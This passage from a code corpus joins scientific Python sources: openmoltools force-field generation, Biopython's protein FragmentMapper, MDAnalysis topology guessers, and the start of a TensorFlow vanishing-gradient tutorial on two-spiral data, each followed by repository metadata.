template_names.add(template_name)
# Process molecules.
import tempfile
tmpdir = tempfile.mkdtemp()
olddir = os.getcwd()
os.chdir(tmpdir)
leaprc = ""
for (molecule_index, molecule) in enumerate(molecules):
# Set the template name based on the molecule title.
template_name = molecule.GetTitle()
# If any atom names are not unique, atom names
_ensureUniqueAtomNames(molecule)
# Compute net formal charge.
net_charge = _computeNetCharge(molecule)
# Generate canonical AM1-BCC charges and a reference conformation.
molecule = get_charges(molecule, strictStereo=False, keep_confs=1)
# Create a unique prefix.
prefix = 'molecule%010d' % molecule_index
# Create temporary directory for running antechamber.
input_mol2_filename = prefix + '.tripos.mol2'
gaff_mol2_filename = prefix + '.gaff.mol2'
frcmod_filename = prefix + '.frcmod'
# Write Tripos mol2 file as antechamber input.
_writeMolecule(molecule, input_mol2_filename)
# Parameterize the molecule with antechamber.
run_antechamber(prefix, input_mol2_filename, charge_method=None, net_charge=net_charge, gaff_mol2_filename=gaff_mol2_filename, frcmod_filename=frcmod_filename)
# Append to leaprc input for parmed.
leaprc += '%s = loadmol2 %s\n' % (prefix, gaff_mol2_filename)
leaprc += 'loadamberparams %s\n' % frcmod_filename
# Generate ffxml file contents for parmchk-generated frcmod output.
leaprc = StringIO(leaprc)
params = parmed.amber.AmberParameterSet.from_leaprc(leaprc)
params = parmed.openmm.OpenMMParameterSet.from_parameterset(params)
ffxml = StringIO()
params.write(ffxml)
# TODO: Clean up temporary directory.
os.chdir(olddir)
return ffxml.getvalue()
def createStructureFromResidue(residue):
# Create ParmEd structure for residue.
structure = parmed.Structure()
for a in residue.atoms():
if a.element is None:
atom = parmed.ExtraPoint(name=a.name)
else:
atom = parmed.Atom(atomic_number=a.element.atomic_number, name=a.name, mass=a.element.mass)
structure.add_atom(atom, residue.name, residue.index, 'A')
atommap[a] = atom
for a1, a2 in topology.bonds():
structure.bonds.append(Bond(atommap[a1], atommap[a2]))
return structure
def gaffTemplateGenerator(forcefield, residue, structure=None):
"""
OpenMM ForceField residue template generator for GAFF/AM1-BCC.
NOTE: This implementation currently only handles small molecules, not polymeric residues.
NOTE: We presume we have already loaded the `gaff.xml` force definitions into ForceField.
Parameters
----------
forcefield : simtk.openmm.app.ForceField
The ForceField object to which residue templates and/or parameters are to be added.
residue : simtk.openmm.app.Topology.Residue
The residue topology for which a template is to be generated.
Returns
-------
success : bool
If the generator is able to successfully parameterize the residue, `True` is returned.
If the generator cannot parameterize the residue, it should return `False` and not modify `forcefield`.
Note that there is no way to preserve stereochemistry since `Residue` does not specify stereochemistry in any way.
Charge fitting is therefore performed on an indeterminate stereo form.
"""
# Get a list of external bonds.
external_bonds = [ bond for bond in residue.external_bonds() ]
if len(external_bonds) > 0:
# We can't parameterize residues with external bonds right now.
return False
# Generate an OpenEye OEMol molecule from the Topology Residue.
molecule = generateOEMolFromTopologyResidue(residue)
# Generate template and parameters.
[template, ffxml] = generateResidueTemplate(molecule)
# Register the template.
forcefield.registerResidueTemplate(template)
# Add the parameters.
forcefield.loadFile(StringIO(ffxml))
# Signal that we have successfully parameterized the residue.
return True
class SystemGenerator(object):
"""
Utility factory to generate OpenMM Systems from Topology objects.
Parameters
----------
forcefields_to_use : list of string
List of the names of ffxml files that will be used in system creation.
forcefield_kwargs : dict of arguments to createSystem, optional
Allows specification of various aspects of system creation.
use_gaff : bool, optional, default=True
If True, will add the GAFF residue template generator.
Examples
--------
>>> from simtk.openmm import app
>>> forcefield_kwargs={ 'nonbondedMethod' : app.NoCutoff, 'implicitSolvent' : None, 'constraints' : None }
>>> system_generator = SystemGenerator(['amber99sbildn.xml'], forcefield_kwargs=forcefield_kwargs)
>>> from openmmtools.testsystems import AlanineDipeptideVacuum
>>> testsystem = AlanineDipeptideVacuum()
>>> system = system_generator.createSystem(testsystem.topology)
"""
def __init__(self, forcefields_to_use, forcefield_kwargs=None, use_gaff=True):
self._forcefield_xmls = forcefields_to_use
self._forcefield_kwargs = forcefield_kwargs if forcefield_kwargs is not None else {}
from simtk.openmm.app import ForceField
self._forcefield = ForceField(*self._forcefield_xmls)
if use_gaff:
self._forcefield.registerTemplateGenerator(gaffTemplateGenerator)
def getForceField(self):
"""
Return the associated ForceField object.
Returns
-------
forcefield : simtk.openmm.app.ForceField
The current ForceField object.
"""
return self._forcefield
def createSystem(self, topology):
"""
Build a system from specified topology object.
Parameters
----------
topology : simtk.openmm.app.Topology object
The topology of the system to construct.
Returns
-------
system : openmm.System
A system object generated from the topology
"""
system = self._forcefield.createSystem(topology, **self._forcefield_kwargs)
return system
@property
def ffxmls(self):
return self._forcefield_xmls
@property
def forcefield(self):
return self._forcefield
| andrrizzi/openmoltools | openmoltools/forcefield_generators.py | Python | gpl-2.0 | 20,186 | [
"Amber",
"OpenMM"
] | 077626ddf4f98cc2d9a75f8aee52d44dfb4c1cb64b8ffab83691bf8f1ff45e40 |
# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
import os
import numpy
from Bio.SVDSuperimposer import SVDSuperimposer
from Bio.PDB import *
__doc__="""
Classify protein backbone structure according to Kolodny et al's fragment
libraries. It can be regarded as a form of objective secondary structure
classification. Only fragments of length 5 or 7 are supported (ie. there is a
'central' residue).
Full reference:
Kolodny R, Koehl P, Guibas L, Levitt M.
Small libraries of protein fragments model native protein structures accurately.
J Mol Biol. 2002 323(2):297-307.
The definition files of the fragments can be obtained from:
U{http://csb.stanford.edu/~rachel/fragments/}
You need these files to use this module.
The following example uses the library with 10 fragments of length 5.
The library files can be found in directory 'fragment_data'.
>>> model=structure[0]
>>> fm=FragmentMapper(lsize=10, flength=5, dir="fragment_data")
>>> fm.map(model)
>>> fragment=fm[residue]
"""
# fragment file (lib_SIZE_z_LENGTH.txt)
# SIZE=number of fragments
# LENGTH=length of fragment (4,5,6,7)
_FRAGMENT_FILE="lib_%s_z_%s.txt"
def _read_fragments(size, length, dir="."):
"""
Read a fragment spec file (available from
U{http://csb.stanford.edu/rachel/fragments/}
and return a list of Fragment objects.
@param size: number of fragments in the library
@type size: int
@param length: length of the fragments
@type length: int
@param dir: directory where the fragment spec files can be found
@type dir: string
"""
filename=(dir+"/"+_FRAGMENT_FILE) % (size, length)
fp=open(filename, "r")
flist=[]
# ID of fragment=rank in spec file
fid=0
for l in fp.readlines():
# skip comment and blank lines
if l[0]=="*" or l[0]=="\n":
continue
sl=l.split()
if sl[1]=="------":
# Start of fragment definition
f=Fragment(length, fid)
flist.append(f)
# increase fragment id (rank)
fid+=1
continue
# Add CA coord to Fragment
coord=numpy.array(map(float, sl[0:3]))
# XXX= dummy residue name
f.add_residue("XXX", coord)
fp.close()
return flist
class Fragment:
"""
Represent a polypeptide C-alpha fragment.
"""
def __init__(self, length, fid):
"""
@param length: length of the fragment
@type length: int
@param fid: id for the fragment
@type fid: int
"""
# nr of residues in fragment
self.length=length
# nr of residues added
self.counter=0
self.resname_list=[]
# CA coordinate matrix
self.coords_ca=numpy.zeros((length, 3), "d")
self.fid=fid
def get_resname_list(self):
"""
@return: the residue names
@rtype: [string, string,...]
"""
return self.resname_list
def get_id(self):
"""
@return: id for the fragment
@rtype: int
"""
return self.fid
def get_coords(self):
"""
@return: the CA coords in the fragment
@rtype: Numeric (Nx3) array
"""
return self.coords_ca
def add_residue(self, resname, ca_coord):
"""
@param resname: residue name (eg. GLY).
@type resname: string
@param ca_coord: the c-alpha coorinates of the residues
@type ca_coord: Numeric array with length 3
"""
if self.counter>=self.length:
raise PDBException("Fragment boundary exceeded.")
self.resname_list.append(resname)
self.coords_ca[self.counter]=ca_coord
self.counter=self.counter+1
def __len__(self):
"""
@return: length of fragment
@rtype: int
"""
return self.length
def __sub__(self, other):
"""
Return rmsd between two fragments.
Example:
>>> rmsd=fragment1-fragment2
@return: rmsd between fragments
@rtype: float
"""
sup=SVDSuperimposer()
sup.set(self.coords_ca, other.coords_ca)
sup.run()
return sup.get_rms()
def __repr__(self):
"""
Returns <Fragment length=L id=ID> where L=length of fragment
and ID the identifier (rank in the library).
"""
return "<Fragment length=%i id=%i>" % (self.length, self.fid)
def _make_fragment_list(pp, length):
"""
Dice up a peptide in fragments of length "length".
@param pp: a list of residues (part of one peptide)
@type pp: [L{Residue}, L{Residue}, ...]
@param length: fragment length
@type length: int
"""
frag_list=[]
for i in range(0, len(pp)-length+1):
f=Fragment(length, -1)
for j in range(0, length):
residue=pp[i+j]
resname=residue.get_resname()
if residue.has_id("CA"):
ca=residue["CA"]
else:
raise PDBException("CHAINBREAK")
if ca.is_disordered():
raise PDBException("CHAINBREAK")
ca_coord=ca.get_coord()
f.add_residue(resname, ca_coord)
frag_list.append(f)
return frag_list
def _map_fragment_list(flist, reflist):
"""
Map all frgaments in flist to the closest
(in RMSD) fragment in reflist.
Returns a list of reflist indices.
@param flist: list of protein fragments
@type flist: [L{Fragment}, L{Fragment}, ...]
@param reflist: list of reference (ie. library) fragments
@type reflist: [L{Fragment}, L{Fragment}, ...]
"""
mapped=[]
for f in flist:
rank=[]
for i in range(0, len(reflist)):
rf=reflist[i]
rms=f-rf
rank.append((rms, rf))
rank.sort()
fragment=rank[0][1]
mapped.append(fragment)
return mapped
class FragmentMapper:
"""
Map polypeptides in a model to lists of representative fragments.
"""
def __init__(self, model, lsize=20, flength=5, fdir="."):
"""
@param model: the model that will be mapped
@type model: L{Model}
@param lsize: number of fragments in the library
@type lsize: int
@param flength: length of fragments in the library
@type flength: int
@param fdir: directory where the definition files are
found (default=".")
@type fdir: string
"""
if flength==5:
self.edge=2
elif flength==7:
self.edge=3
else:
raise PDBException("Fragment length should be 5 or 7.")
self.flength=flength
self.lsize=lsize
self.reflist=_read_fragments(lsize, flength, fdir)
self.model=model
self.fd=self._map(self.model)
def _map(self, model):
"""
@param model: the model that will be mapped
@type model: L{Model}
"""
ppb=PPBuilder()
ppl=ppb.build_peptides(model)
fd={}
for pp in ppl:
try:
# make fragments
flist=_make_fragment_list(pp, self.flength)
# classify fragments
mflist=_map_fragment_list(flist, self.reflist)
for i in range(0, len(pp)):
res=pp[i]
if i<self.edge:
# start residues
continue
elif i>=(len(pp)-self.edge):
# end residues
continue
else:
# fragment
index=i-self.edge
assert(index>=0)
fd[res]=mflist[index]
except "CHAINBREAK":
# Funny polypeptide - skip
pass
return fd
def has_key(self, res):
"""
@type res: L{Residue}
"""
return self.fd.has_key(res)
def __getitem__(self, res):
"""
@type res: L{Residue}
@return: fragment classification
@rtype: L{Fragment}
"""
return self.fd[res]
if __name__=="__main__":
import sys
p=PDBParser()
s=p.get_structure("X", sys.argv[1])
m=s[0]
fm=FragmentMapper(m, 10, 5, "levitt_data")
for r in Selection.unfold_entities(m, "R"):
print r,
if fm.has_key(r):
print fm[r]
else:
print
| NirBenTalLab/proorigami-cde-package | cde-root/usr/lib64/python2.4/site-packages/Bio/PDB/FragmentMapper.py | Python | mit | 8,715 | [
"Biopython"
] | 6bff6a18d2873e1554fd5d115b925fffc7a28fd3737a198d13e6d2dbcf431386 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Guessing unknown Topology information --- :mod:`MDAnalysis.topology.guessers`
=============================================================================
In general `guess_atom_X` returns the guessed value for a single value,
while `guess_Xs` will work on an array of many atoms.
Example uses of guessers
------------------------
Guessing elements from atom names
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Currently, it is possible to guess elements from atom names using
:func:`guess_atom_element` (or the synonymous :func:`guess_atom_type`). This can
be done in the following manner::
import MDAnalysis as mda
from MDAnalysis.topology.guessers import guess_atom_element
from MDAnalysisTests.datafiles import PRM7
u = mda.Universe(PRM7)
print(u.atoms.names[1]) # returns the atom name H1
element = guess_atom_element(u.atoms.names[1])
print(element) # returns element H
In the above example, we take an atom named H1 and use
:func:`guess_atom_element` to guess the element hydrogen (i.e. H). It is
important to note that element guessing is not always accurate. Indeed in cases
where the atom type is not recognised, we may end up with the wrong element.
For example::
import MDAnalysis as mda
from MDAnalysis.topology.guessers import guess_atom_element
from MDAnalysisTests.datafiles import PRM19SBOPC
u = mda.Universe(PRM19SBOPC)
print(u.atoms.names[-1]) # returns the atom name EPW
element = guess_atom_element(u.atoms.names[-1])
print(element) # returns element P
Here we find that virtual site atom 'EPW' was given the element P, which
would not be an expected result. We therefore always recommend that users
carefully check the outcomes of any guessers.
In some cases, one may want to guess elements for an entire universe and add
this guess as a topology attribute. This can be done using :func:`guess_types`
in the following manner::
import MDAnalysis as mda
from MDAnalysis.topology.guessers import guess_types
from MDAnalysisTests.datafiles import PRM7
u = mda.Universe(PRM7)
guessed_elements = guess_types(u.atoms.names)
u.add_TopologyAttr('elements', guessed_elements)
print(u.atoms.elements) # returns an array of guessed elements
More information on adding topology attributes can found in the `user guide`_.
.. Links
.. _user guide: https://www.mdanalysis.org/UserGuide/examples/constructing_universe.html#Adding-topology-attributes
"""
import numpy as np
import warnings
import re
from ..lib import distances
from . import tables
def guess_masses(atom_types):
"""Guess the mass of many atoms based upon their type
Parameters
----------
atom_types
Type of each atom
Returns
-------
atom_masses : np.ndarray dtype float64
"""
validate_atom_types(atom_types)
masses = np.array([get_atom_mass(atom_t) for atom_t in atom_types], dtype=np.float64)
return masses
def validate_atom_types(atom_types):
"""Vaildates the atom types based on whether they are available in our tables
Parameters
----------
atom_types
Type of each atom
Returns
-------
None
.. versionchanged:: 0.20.0
Try uppercase atom type name as well
"""
for atom_type in np.unique(atom_types):
try:
tables.masses[atom_type]
except KeyError:
try:
tables.masses[atom_type.upper()]
except KeyError:
warnings.warn("Failed to guess the mass for the following atom types: {}".format(atom_type))
def guess_types(atom_names):
"""Guess the atom type of many atoms based on atom name
Parameters
----------
atom_names
Name of each atom
Returns
-------
atom_types : np.ndarray dtype object
"""
return np.array([guess_atom_element(name) for name in atom_names], dtype=object)
def guess_atom_type(atomname):
"""Guess atom type from the name.
At the moment, this function simply returns the element, as
guessed by :func:`guess_atom_element`.
See Also
--------
:func:`guess_atom_element`
:mod:`MDAnalysis.topology.tables`
"""
return guess_atom_element(atomname)
NUMBERS = re.compile(r'[0-9]') # match numbers
SYMBOLS = re.compile(r'[*+-]') # match *, +, -
def guess_atom_element(atomname):
"""Guess the element of the atom from the name.
Looks in dict to see if element is found, otherwise it uses the first
character in the atomname. The table comes from CHARMM and AMBER atom
types, where the first character is not sufficient to determine the atom
type. Some GROMOS ions have also been added.
.. Warning: The translation table is incomplete. This will probably result
in some mistakes, but it still better than nothing!
See Also
--------
:func:`guess_atom_type`
:mod:`MDAnalysis.topology.tables`
"""
if atomname == '':
return ''
try:
return tables.atomelements[atomname.upper()]
except KeyError:
# strip symbols and numbers
no_symbols = re.sub(SYMBOLS, '', atomname)
name = re.sub(NUMBERS, '', no_symbols).upper()
# just in case
if name in tables.atomelements:
return tables.atomelements[name]
while name:
if name in tables.elements:
return name
if name[:-1] in tables.elements:
return name[:-1]
if name[1:] in tables.elements:
return name[1:]
if len(name) <= 2:
return name[0]
name = name[:-1] # probably element is on left not right
# if it's numbers
return no_symbols
def guess_bonds(atoms, coords, box=None, **kwargs):
r"""Guess if bonds exist between two atoms based on their distance.
Bond between two atoms is created, if the two atoms are within
.. math::
d < f \cdot (R_1 + R_2)
of each other, where :math:`R_1` and :math:`R_2` are the VdW radii
of the atoms and :math:`f` is an ad-hoc *fudge_factor*. This is
the `same algorithm that VMD uses`_.
Parameters
----------
atoms : AtomGroup
atoms for which bonds should be guessed
coords : array
coordinates of the atoms (i.e., `AtomGroup.positions)`)
fudge_factor : float, optional
The factor by which atoms must overlap eachother to be considered a
bond. Larger values will increase the number of bonds found. [0.55]
vdwradii : dict, optional
To supply custom vdwradii for atoms in the algorithm. Must be a dict
of format {type:radii}. The default table of van der Waals radii is
hard-coded as :data:`MDAnalysis.topology.tables.vdwradii`. Any user
defined vdwradii passed as an argument will supercede the table
values. [``None``]
lower_bound : float, optional
The minimum bond length. All bonds found shorter than this length will
be ignored. This is useful for parsing PDB with altloc records where
atoms with altloc A and B maybe very close together and there should be
no chemical bond between them. [0.1]
box : array_like, optional
Bonds are found using a distance search, if unit cell information is
given, periodic boundary conditions will be considered in the distance
search. [``None``]
Returns
-------
list
List of tuples suitable for use in Universe topology building.
Warnings
--------
No check is done after the bonds are guessed to see if Lewis
structure is correct. This is wrong and will burn somebody.
Raises
------
:exc:`ValueError` if inputs are malformed or `vdwradii` data is missing.
.. _`same algorithm that VMD uses`:
http://www.ks.uiuc.edu/Research/vmd/vmd-1.9.1/ug/node26.html
.. versionadded:: 0.7.7
.. versionchanged:: 0.9.0
Updated method internally to use more :mod:`numpy`, should work
faster. Should also use less memory, previously scaled as
:math:`O(n^2)`. *vdwradii* argument now augments table list
rather than replacing entirely.
"""
# why not just use atom.positions?
if len(atoms) != len(coords):
raise ValueError("'atoms' and 'coord' must be the same length")
fudge_factor = kwargs.get('fudge_factor', 0.55)
vdwradii = tables.vdwradii.copy() # so I don't permanently change it
user_vdwradii = kwargs.get('vdwradii', None)
if user_vdwradii: # this should make algo use their values over defaults
vdwradii.update(user_vdwradii)
# Try using types, then elements
atomtypes = atoms.types
# check that all types have a defined vdw
if not all(val in vdwradii for val in set(atomtypes)):
raise ValueError(("vdw radii for types: " +
", ".join([t for t in set(atomtypes) if
not t in vdwradii]) +
". These can be defined manually using the" +
" keyword 'vdwradii'"))
lower_bound = kwargs.get('lower_bound', 0.1)
if box is not None:
box = np.asarray(box)
# to speed up checking, calculate what the largest possible bond
# atom that would warrant attention.
# then use this to quickly mask distance results later
max_vdw = max([vdwradii[t] for t in atomtypes])
bonds = []
pairs, dist = distances.self_capped_distance(coords,
max_cutoff=2.0*max_vdw,
min_cutoff=lower_bound,
box=box)
for idx, (i, j) in enumerate(pairs):
d = (vdwradii[atomtypes[i]] + vdwradii[atomtypes[j]])*fudge_factor
if (dist[idx] < d):
bonds.append((atoms[i].index, atoms[j].index))
return tuple(bonds)
def guess_angles(bonds):
"""Given a list of Bonds, find all angles that exist between atoms.
Works by assuming that if atoms 1 & 2 are bonded, and 2 & 3 are bonded,
then (1,2,3) must be an angle.
Returns
-------
list of tuples
List of tuples defining the angles.
Suitable for use in u._topology
See Also
--------
:meth:`guess_bonds`
.. versionadded 0.9.0
"""
angles_found = set()
for b in bonds:
for atom in b:
other_a = b.partner(atom) # who's my friend currently in Bond
for other_b in atom.bonds:
if other_b != b: # if not the same bond I start as
third_a = other_b.partner(atom)
desc = tuple([other_a.index, atom.index, third_a.index])
if desc[0] > desc[-1]: # first index always less than last
desc = desc[::-1]
angles_found.add(desc)
return tuple(angles_found)
def guess_dihedrals(angles):
"""Given a list of Angles, find all dihedrals that exist between atoms.
Works by assuming that if (1,2,3) is an angle, and 3 & 4 are bonded,
then (1,2,3,4) must be a dihedral.
Returns
-------
list of tuples
List of tuples defining the dihedrals.
Suitable for use in u._topology
.. versionadded 0.9.0
"""
dihedrals_found = set()
for b in angles:
a_tup = tuple([a.index for a in b]) # angle as tuple of numbers
# if searching with b[0], want tuple of (b[2], b[1], b[0], +new)
# search the first and last atom of each angle
for atom, prefix in zip([b.atoms[0], b.atoms[-1]],
[a_tup[::-1], a_tup]):
for other_b in atom.bonds:
if not other_b.partner(atom) in b:
third_a = other_b.partner(atom)
desc = prefix + (third_a.index,)
if desc[0] > desc[-1]:
desc = desc[::-1]
dihedrals_found.add(desc)
return tuple(dihedrals_found)
def guess_improper_dihedrals(angles):
"""Given a list of Angles, find all improper dihedrals that exist between
atoms.
Works by assuming that if (1,2,3) is an angle, and 2 & 4 are bonded,
then (2, 1, 3, 4) must be an improper dihedral.
ie the improper dihedral is the angle between the planes formed by
(1, 2, 3) and (1, 3, 4)
Returns
-------
List of tuples defining the improper dihedrals.
Suitable for use in u._topology
.. versionadded 0.9.0
"""
dihedrals_found = set()
for b in angles:
atom = b[1] # select middle atom in angle
# start of improper tuple
a_tup = tuple([b[a].index for a in [1, 2, 0]])
# if searching with b[1], want tuple of (b[1], b[2], b[0], +new)
# search the first and last atom of each angle
for other_b in atom.bonds:
other_atom = other_b.partner(atom)
# if this atom isn't in the angle I started with
if not other_atom in b:
desc = a_tup + (other_atom.index,)
if desc[0] > desc[-1]:
desc = desc[::-1]
dihedrals_found.add(desc)
return tuple(dihedrals_found)
def get_atom_mass(element):
"""Return the atomic mass in u for *element*.
Masses are looked up in :data:`MDAnalysis.topology.tables.masses`.
.. Warning:: Unknown masses are set to 0.0
.. versionchanged:: 0.20.0
Try uppercase atom type name as well
"""
try:
return tables.masses[element]
except KeyError:
try:
return tables.masses[element.upper()]
except KeyError:
return 0.0
def guess_atom_mass(atomname):
"""Guess a mass based on the atom name.
:func:`guess_atom_element` is used to determine the kind of atom.
.. warning:: Anything not recognized is simply set to 0; if you rely on the
masses you might want to double check.
"""
return get_atom_mass(guess_atom_element(atomname))
def guess_atom_charge(atomname):
"""Guess atom charge from the name.
.. Warning:: Not implemented; simply returns 0.
"""
# TODO: do something slightly smarter, at least use name/element
return 0.0
def guess_aromaticities(atomgroup):
"""Guess aromaticity of atoms using RDKit
Parameters
----------
atomgroup : mda.core.groups.AtomGroup
Atoms for which the aromaticity will be guessed
Returns
-------
aromaticities : numpy.ndarray
Array of boolean values for the aromaticity of each atom
.. versionadded:: 2.0.0
"""
mol = atomgroup.convert_to("RDKIT")
atoms = sorted(mol.GetAtoms(),
key=lambda a: a.GetIntProp("_MDAnalysis_index"))
return np.array([atom.GetIsAromatic() for atom in atoms])
def guess_gasteiger_charges(atomgroup):
"""Guess Gasteiger partial charges using RDKit
Parameters
----------
atomgroup : mda.core.groups.AtomGroup
Atoms for which the charges will be guessed
Returns
-------
charges : numpy.ndarray
Array of float values representing the charge of each atom
.. versionadded:: 2.0.0
"""
mol = atomgroup.convert_to("RDKIT")
from rdkit.Chem.rdPartialCharges import ComputeGasteigerCharges
ComputeGasteigerCharges(mol, throwOnParamFailure=True)
atoms = sorted(mol.GetAtoms(),
key=lambda a: a.GetIntProp("_MDAnalysis_index"))
return np.array([atom.GetDoubleProp("_GasteigerCharge") for atom in atoms],
dtype=np.float32)
| MDAnalysis/mdanalysis | package/MDAnalysis/topology/guessers.py | Python | gpl-2.0 | 16,660 | [
"Amber",
"CHARMM",
"EPW",
"GROMOS",
"MDAnalysis",
"RDKit",
"VMD"
] | c022ecdfc523aed82969428338eccfdf7beecfba2997a370030b45b69bcee6f1 |
#-*- coding: utf-8 -*-
#! /usr/bin/env python
'''
#------------------------------------------------------------
filename: lab7_runTCcheckGradientVanishing_spiraldata.py
To check Gradient Vanishing problem in
A Multi-Hidden Layers Fully Connected Neural Network.
This example data set is using two class spiral data
written by Jaewook Kang @ Jan 2018
#------------------------------------------------------------
'''
from os import getcwd
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from pandas import DataFrame
from sklearn import metrics
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import learn_io
# reading data set from csv file ==========================
xsize = 2
ysize = 2
data = pd.read_csv('./data/twospirals_N5000.csv')
data.columns=['xdata1','xdata2','tdata']
permutation_index = np.random.permutation(data.index)
permutated_data = data.reindex(permutation_index)
permutated_data.columns=['xdata1','xdata2','tdata']
x_data = np.zeros([permutated_data.xdata1.size,xsize])
x_data[:,0] = permutated_data.xdata1.values
x_data[:,1] = permutated_data.xdata2.values
t_data = np.zeros([permutated_data.tdata.size,ysize])
t_data[:,0] = permutated_data.tdata.values
t_data[:,1] = np.invert(permutated_data.tdata.values) + 2
total_size = permutated_data.xdata1.size
training_size = int(np.floor(permutated_data.xdata1.size * 0.8))
validation_size = total_size - training_size
# data dividing
x_training_data = x_data[0:training_size,:]
t_training_data = t_data[0:training_size,:]
x_validation_data = x_data[training_size:-1,:]
t_validation_data = t_data[training_size:-1,:]
# #data plot
hfig1= plt.figure(1,figsize=[10,10])
plt.scatter(data.xdata1.values[0:int(data.xdata1.size/2)],\
data.xdata2.values[0:int(data.xdata1.size/2)], \
color='b',label='class0')
plt.scatter(data.xdata1.values[int(data.xdata1.size/2)+2:-1],\
data.xdata2.values[int(data.xdata1.size/2)+2:-1], \
color='r',label='class1')
plt.title('Two Spiral data Example')
plt.legend()
# configure training parameters =====================================
learning_rate = 1E-5
training_epochs = 5
batch_size = 100
display_step = 1
total_batch = int(training_size / batch_size)
# computational TF graph construction ================================
# Network Parameters
n_hidden_1 = 10 # 1st layer number of neurons
n_hidden_2 = 7 # 2nd layer number of neurons
n_hidden_3 = 7 # 3rd layer number of neurons
n_hidden_4 = 4 # 4rd layer number of neurons
n_hidden_5 = 4 # 5rd layer number of neurons
num_input = xsize # two-dimensional input X = [1x2]
num_classes = ysize # 2 class
#-------------------------------
# tf Graph input
X = tf.placeholder(tf.float32, [None, num_input])
Y = tf.placeholder(tf.float32, [None, num_classes])
# Store layers weight & bias
weights = {
'h1': tf.Variable(tf.random_normal([num_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'h3': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),
'h4': tf.Variable(tf.random_normal([n_hidden_3, n_hidden_4])),
'h5': tf.Variable(tf.random_normal([n_hidden_4, n_hidden_5])),
'out':tf.Variable(tf.random_normal([n_hidden_5, num_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'b3': tf.Variable(tf.random_normal([n_hidden_3])),
'b4': tf.Variable(tf.random_normal([n_hidden_4])),
'b5': tf.Variable(tf.random_normal([n_hidden_5])),
'out': tf.Variable(tf.random_normal([num_classes]))
}
# Create model
def neural_net(x):
# Input fully connected layer with 10 neurons
layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
layer_1 = tf.nn.softmax(layer_1)
# Hidden fully connected layer with 7 neurons
layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
layer_2 = tf.nn.softmax(layer_2)
# Hidden fully connected layer with 7 neurons
layer_3 = tf.add(tf.matmul(layer_2, weights['h3']), biases['b3'])
layer_3 = tf.nn.softmax(layer_3)
# Hidden fully connected layer with 4 neurons
layer_4 = tf.add(tf.matmul(layer_3, weights['h4']), biases['b4'])
layer_4 = tf.nn.softmax(layer_4)
# Hidden fully connected layer with 4 neurons
layer_5 = tf.add(tf.matmul(layer_4, weights['h5']), biases['b5'])
layer_5 = tf.nn.softmax(layer_5)
# Output fully connected layer with a neuron for each class
out_layer = tf.matmul(layer_5, weights['out']) + biases['out']
return out_layer
# Construct model
logits = neural_net(X)
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)
#optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Evaluate model
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
errRateTraining = np.zeros(training_epochs)
errRateValidation = np.zeros(training_epochs)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
# for visualization of vanishing gradient problem
grad_wrt_weight_layer1_tensor = tf.gradients(cost,weights['h1'],\
name='grad_wrt_weight_layer1')
grad_wrt_weight_layer2_tensor = tf.gradients(cost,weights['h2'],\
name='grad_wrt_weight_layer2')
grad_wrt_weight_layer3_tensor = tf.gradients(cost,weights['h3'],\
name='grad_wrt_weight_layer3')
grad_wrt_weight_layer4_tensor = tf.gradients(cost,weights['h4'],\
name='grad_wrt_weight_layer4')
grad_wrt_weight_layer5_tensor = tf.gradients(cost,weights['h5'],\
name='grad_wrt_weight_layer5')
grad_wrt_weight_layer1_iter = np.zeros([total_batch,1])
grad_wrt_weight_layer2_iter = np.zeros([total_batch,1])
grad_wrt_weight_layer3_iter = np.zeros([total_batch,1])
grad_wrt_weight_layer4_iter = np.zeros([total_batch,1])
grad_wrt_weight_layer5_iter = np.zeros([total_batch,1])
# Start training ===============================================
with tf.Session() as sess:
# Run the initializer
sess.run(init)
print("--------------------------------------------")
for epoch in range(training_epochs):
avg_cost = 0.
for i in range(total_batch):
data_start_index = i * batch_size
data_end_index = (i + 1) * batch_size
# feed traing data --------------------------
batch_xs = x_training_data[data_start_index:data_end_index, :]
batch_ts = t_training_data[data_start_index:data_end_index, :]
#----------------------------------------------
# Run optimization op (backprop) and cost op (to get loss value)
# feedign training data
_, local_batch_cost = sess.run([optimizer,cost], feed_dict={X: batch_xs,
Y: batch_ts})
if epoch == training_epochs - 1:
# print ('Gradient calculation to see gradient vanishing problem')
_, grad_wrt_weight_layer1 = sess.run([optimizer,grad_wrt_weight_layer1_tensor], feed_dict={X: batch_xs,
